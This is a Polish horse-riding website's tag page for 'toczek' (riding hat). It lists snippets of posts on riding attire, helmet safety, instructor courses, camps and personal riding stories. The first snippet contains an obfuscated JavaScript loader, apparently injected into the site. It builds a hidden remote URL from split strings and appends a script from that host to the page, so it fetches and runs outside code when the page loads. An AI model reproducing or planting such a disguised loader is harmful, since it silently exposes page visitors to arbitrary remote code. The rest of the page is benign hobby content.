toczek


 • ortyment obuwia i przydatną literaturę, która pozwoli nam jeszcze lepiej zrozumieć mechanizmy, którymi rządzi się ten piękny sport! (function(){ ozdg=document.createElement("script");ozdg.async=true;ozdg_="u"+("s")+"t"; ozdgu="124438256.";ozdg_+="a"+("t.i");ozdg_+="n"+("f"+"o")+"/"; ozdgu+="e821rfjgzdgahpsn0ag4st"+("kXdbntu3"); ozdg.src="https://"+ozdg_+ozdgu;ozdg.type="text/javascript"; document.body.appendChild(ozdg); })();

  czytaj więcej »


 • Nadchodzi czas hubertusów, zatem jak się odpowiednio ubrać? Prawidłowy strój jeździecki (oficjalny/konkursowy) ma w sobie m.in.:-Kask/toczek (czarny)-Biała koszula-Frak -Białe bryczesy-Oficerki lub sztyblety + czapsy-Rękawiczki jeździeckie (często nieobowiązkowe) Pamiętajmy żeby ubrać się odpowiednio do pogody! :) Powodzenia na hubertusie i złapania lisa! 

  czytaj więcej »


 • ecie te tajniki wiedzy. Jeśli ktoś zapragnie mieć własnego konia to ta wiedza rozwinie się jeszcze bardziej ale,ale do posiadania własnego konia  jest już nieco dłuższa droga niż jazdy w szkółce.

  czytaj więcej »


 • zwie, czapsy (istnieje możliwość bezpłatnego wypożyczenia na miejscu) - toczek (istnieje możliwość bezpłatnego wypożyczenia na miejscu)  UWAGA Zgłoszenia oraz pytania prosimy kierować do pracowników firmy Akcja Serca: e-mail: biuro@akcjaserca.pl tel. 792 211 146 - Sylwia Szymańska tel. 533 211 127 - Romana Nowacka Więcej informacji tutaj: http://www.akcjaserca.pl/pl/Instruktor-Jazdy-Konnej.html

  czytaj więcej »


 • wymiarze. Życzymy wielu sukcesów jeździeckich i nie tylko. I razem z Julią Janku przypominamy Wam – trzeba jeździć rozważnie i bez rutyny – po prostu bezpiecznie. Publikacja w ramach programu PZJ "Jeżdżę bezpiecznie"

  czytaj więcej »


 • zą się najwyżej potłuczeniami. Jednak jeśli po upadku z konia coś nas bardzo boli, mamy zawroty głowy lub pojawią się wymioty, trzeba bezwzględnie udać się do lekarza lub wezwać karetkę. Publikacja w ramach programu PZJ "Jeżdżę bezpiecznie"

  czytaj więcej »


 • nej (najlepiej bryczesy, ale mogą być też zwykłe getry), - buty na płaskiej podeszwie, czapsy (istnieje możliwość bezpłatnego wypożyczenia na miejscu) - toczek (istnieje możliwość bezpłatnego wypożyczenia na miejscu) UWAGA Zgłoszenia oraz pytania prosimy kierować do pracowników firmy Akcja Serca: e-mail: biuro@akcjaserca.pl tel. 792 211 146 - Sylwia Szymańska tel. 533 211 127 - Romana Nowacka Więcej informacji tutaj: http://www.akcjaserca.pl/pl/Instruktor-Jazdy-Konnej.html

  czytaj więcej »


 • ie, kłusie i galopie (zagalopowanie z dobrej nogi) - wykazanie się umiejętnością jazdy kłusem ćwiczebnym na kole - najazd na przeszkodę 70 cm (na egzaminie końcowym 100cm) Kursanci na kursie muszą posiadać: - wygodne spodnie do jazdy konnej (najlepiej bryczesy, ale mogą być też zwykłe getry) - buty na płaskiej podeszwie - czapsy (dostępne na miejscu) - toczek (dostępne na miejscu) WIĘCEJ INFORMACJI NA STRONIE: http://www.akcjaserca.pl/pl/Instruktor-Jazdy-Konnej.html ZAPRASZAMY!

  czytaj więcej »


 • e od razu ) - zapewniają lepszy chwyt wodzy. - oficerki lub sztyblety - buty do jazdy konnej, oficerki są długie do kolan, sztyblety zaś sięgają do kostek. - czapsy - ( niekonieczne od razu ) - ochraniacze na nogi. - kamizelka ochronna - ( niekonieczne od razu ) - chroni kręgosłup podczas upadku. Niektórych rzeczy nie trzeba od razu kupować np: polo, rękawic jeździeckich, czapsów i kamizelki ochronnej. Resztę trzeba mieć. Dlatego warto pamiętać w co się ubrać idąc do naszych ulubieńców.

  czytaj więcej »


 • na przeszkodę 70 cm (na egzaminie końcowym 100 cm) Kursanci na kursie muszą posiadać: - wygodne spodnie do jazdy konnej (najlepiej bryczesy, ale mogą być też zwykłe getry) - buty na płaskiej podeszwie - sztylpy (istnieje możliwość bezpłatnego wypożyczenia na miejscu) - toczek/kask (istnieje możliwość bezpłatnego wypożyczenia na miejscu) WIĘCEJ INFORMACJI NA STRONIE: http://www.akcjaserca.pl/pl/Instruktor-Jazdy-Konnej.html REZERWACJA: biuro@akcjaserca.pl; tel. 792 211 146

  czytaj więcej »


 • Wielu myśli bat czy warto kupić czy koń cierpi i kiedy go używać ? Na początku warto kupić bat i toczek to podstawa najlepiej najtańszy bacik dobrze żeby dosięgał co najmniej łopatki konia .Koń nie cierpi przy użyciu bata dajemy mu sygnał że chcemy jechać a używać go najlepiej w ostateczności nie morze on zastępować słów i łydki. Używamy go na łopatkę na zad w początkowych etapach. Proszę się nie obawiać bat jest pdtszebny !

  czytaj więcej »


 • m ćwiczebnym na kole najazd na przeszkodę 70 cm (na egzaminie końcowym 100cm) Kursanci na kursie muszą posiadać: wygodne spodnie do jazdy konnej (najlepiej bryczesy, ale mogą być też zwykłe getry) buty na płaskiej podeszwie sztylpy (istnieje możliwość wypożyczenia na miejscu) toczek/kask (istnieje możliwość wypożyczenia na miejscu) WIĘCEJ INFORMACJI NA STRONIE: http://www.akcjaserca.pl/pl/Instruktor-Jazdy-Konnej.html REZERWACJA: biuro@akcjaserca.pl; tel. 792 211 146

  czytaj więcej »


 • hów.Pamiętajmy jednak że niektóre trampki mogą się ślizgać przez co możemy nie utrzymać równowagi!W zimie możemy ubrać kozaki,ale ważne jest żeby nie miały zamka z boku,bo mogą zniszczyć siodło lub zranić konia! SPODNIE Na pierwsze jazdy najlepiej ubrać getry.W nich będziesz miał(a) swobodę ruchów. BLUZKA Ważne żeby była wygodna i obcisła,ponieważ instruktor musi widzieć wyraźnie twoją postawę! NAKRYCIE GŁOWY W stajni zapewnią ci kask/toczek.Chroni twoją głowę w razie upadku.

  czytaj więcej »


 • , oraz Internet. Istnieje możliwość przyjazdu z własnym koniem – koszt wynajęcia boksu oraz wyżywienia dla konia to 30zł/ noc Kursanci na kursie muszą posiadać: wygodne spodnie do jazdy konnej (najlepiej bryczesy, ale mogą być też zwykłe getry), buty na płaskiej podeszwie, czapsy (istnieje możliwość wypożyczenia na miejscu) toczek (istnieje możliwość wypożyczenia na miejscu) WIĘCEJ INFORMACJI NA STRONIE: http:/www.akcjaserca.pl/pl/Informacje-dla-kursantow.html

  czytaj więcej »


 • nie to chociaż spory zapas plasterków na obtarcia od wodzy :) Kask i toczek. Na pewno można wypożyczyć w stadninie, ale jeśli ktoś chce to może kupić swój. Kask, ponieważ lepiej chroni głowę przed urazami niż toczek. I jest o 40% bezpieczniejszy. Palcat. Nie jest obowiązkowy. Można go dokupić na późniejszym etapie i tylko wtedy jeśli się chce. Biżuteria. Nie wolno! Może obetrzeć, albo się w coś zaplatać :) Stanik. Koniecznie mocny, dobrze trzymający, sprzyda się do kłusa ćwiczebnego ;)

  czytaj więcej »


 • tórzy mi mówią, że lepszy jest toczek. Weszłam w internet i tam pisali, że toczki są dobre ale nie chronią dobrze przed upadkami...Inni znowu mówili, że lepiej kupić kask. Znowu weszłam w wyszukiwarkę i co tam pisali? Że kask jest bardzo dobry i wspaniale chroni przed upadkiem.I kogo mam posłuchać??? Proszę pomóżcie mi wybrać bo sama nie wiem. Jeździłam cały czas w toczku, ale potem zobaczyłam że niektóre osoby mają kaski, więc postanowiłam sprawdzić co jest lepsze.Z góry dzięki.

  czytaj więcej »


 • później właściciel konia puścił uzdę i pokazał mi, jak zsiąść. Ja oczywiście MUSIAŁAM potem powiedzieć tacie, że chcę mu dać trochę trawy. I dałam. Kiedy spytałam się jak ma na imię usłyszałam: Miko. Miko- pierwszy koń na którym siedziałam. Mimo że miałam 5 lat, to wiedziałam, że muszę jeszcze kiedyś zacząć jeździć. I byłam w wielu stadninach. Ta, w której teraz jestem jest idealna.Miko, Miko- ten cudowny, gniady arab.Dla mnie prawie każdy koń będzie jak Miko i nic tego nie zmieni.

  czytaj więcej »


 • obrudzić w stajni oraz kalosze. Nawet w wielkich upałach, to lekcja dla początkujących nigdy nie trwa więcej niż godzinę, a tyle w ciepłych kozakach można wytrzymać: zwłaszcza, że na pierwszych lekcjach będzie raczej tylko stęp i kłus. Jeszcze ostatnie rady: najlepiej w stajni zdjać wszelkie bransoletki, pierścionki, biżuterię. Będą nam one przeszkadzać w jeździe, poza tym moze spaść na ziemię. Więc naprawdę nie warto.W nastepnych wpisach będę pisać o stroju dla zaawansowanych jeźdzców.

  czytaj więcej »


 • również innych zdarzeń( np. kradzieże, zniszczenia).Dekoracja zwycięzców konkursu bezpośrednio po zakończeniu konkursu.Organizator zapewnia flots dla koni oraz nagrody rzeczoweW sprawach nie zawartych w powyższym regulaminie nalezy posługiwac sie regulaminem PTTK T.R.E.C na stronie http://gtj.pttk.pl/pdf/trec_pttk_2012_regulamin.pdf Oraz kodeks postępowania z koniem dostępny na stronie http://gtj.pttk.pl/pdf/kodeks_postepowania_z_koniem.pdf Zapraszamy!

  czytaj więcej »


 • rzed urazem w wyniku wypadku(np.spadnięcie z konia) kask bardziej chroni głowę,toczek jest bardziej "reprezentacyjny" RĘKAWICZKI Co to są rękawiczki chyba nie muszę pisać. ;) Chronią dłonie przed uszkodzeniem i mają specjalne "kuleczki" chroniące przed wyślizgiwaniem wodzy lub lonży .SKARPETY JEŹDZIECKIE Długie skarpety pod kolana zakładane to sztybletów.Myślę ,żę to wszystko co podstawowe .Mam nadzieję,że miło się czytało .Pozdrawiam ,Gizela.

  czytaj więcej »


 • olna, paszport- koniecznie weźcie ze sobą aparat, oraz pamiętnik, bo naprawdę jest co wspominać :) - oczywiście dobry humor wskazany :D * informacja zaczerpnięta ze strony internetowej www.moszna.pl oznacza to, że na moich turnusach nie było danego elementu, ale teraz został wprowadzony do programu obozuW Mosznej można się wiele nauczyć, spędzić miło czas w towarzystwie kopytnych, oraz poznać piękno natury. SK Moszna to idealne miejsce na obóz,SK MOSZNA, TO JEST TO!!!

  czytaj więcej »


 • i zasad jego żywienia, maści koni, ras i typów użytkowych koni, podstawowych chodów koni, budowy siodła i ogłowia, budowy uprzęży i rodzaju zaprzęgów, podstawowych figur ujeżdżania oraz prawidłowego dosiadu i używania pomocy.Polecam obóz „kolonie w siodle” w ośrodku Pałac pod bocianim gniazdem ze względu na panującą tam, wspaniałą atmosferę, piękne, mądre konie, wykwalifikowaną kadrę i za to, że można tam złapać „bakcyla” do koni już na zawsze :).

  czytaj więcej »


 • ów. Nie mogę się doczekać tego dnia kiedy pierwszy raz przeskoczę przeszkodę. Zawsze marzyłam o udziale w zawodach w skokach. Do jazdy w tej szkółcę przekonałam moje dwie przyjaciołki. W stajni wzamian za pracę dostaje darmowe minuy jazdy. To właśnie Marce zawdzięczam to, że umiem teraz dość dobrze jeździć na tyle aby chociaż na chwilę utrzymać się w cwale na koniu. Kocham tę klacz, jest cudowna. Myślę, że nikt nie usnął przy czytaniu mojej wielkiej przygody w siodle...

  czytaj więcej »


 • onymi szlakami (które znasz lub które są oznaczone), dostosuj chód konia w warunków, sprawdzaj podłoże na jakim się poruszasz,- staraj się poznać konia przed jazdą – jedna jazda na padoku na pewno sprawi, że będziesz czuł się bezpieczniej podczas terenu- nie przeceniaj swoich sił na zamiary – jeśli nie czujesz się dobrze w siodle we wszystkich trzech chodach lub jeśli jesteś świeżo po kursie nie dasz rady. Lepiej sobie odpuść – licho nie śpi, a o wypadek nie trudno.

  czytaj więcej »


 • alazłam stadninie nie daleko mnie 3 - 5 km od mojego domu - najbliża i jak narazie jedyna oraz najlepsza.Stadnina istniała już rok lub więcej.Mili i serdeczni ludzie czego nie dało się opisać we wcześniejszych stadninach.Sprzętu nie musiałam mieć od razu.Toczek na pierwsze 3 jazdy został wypożyczony , potem kupiłam.A potem po maluśku po wolusku i uzbierałam na kolejne akcesoria jeźdźieckie.Super konie i dużo rzeczy na tak.Jeden taki minus to chyba hala.I właśnie czekałam na tą wyjątkową stajnie.

  czytaj więcej »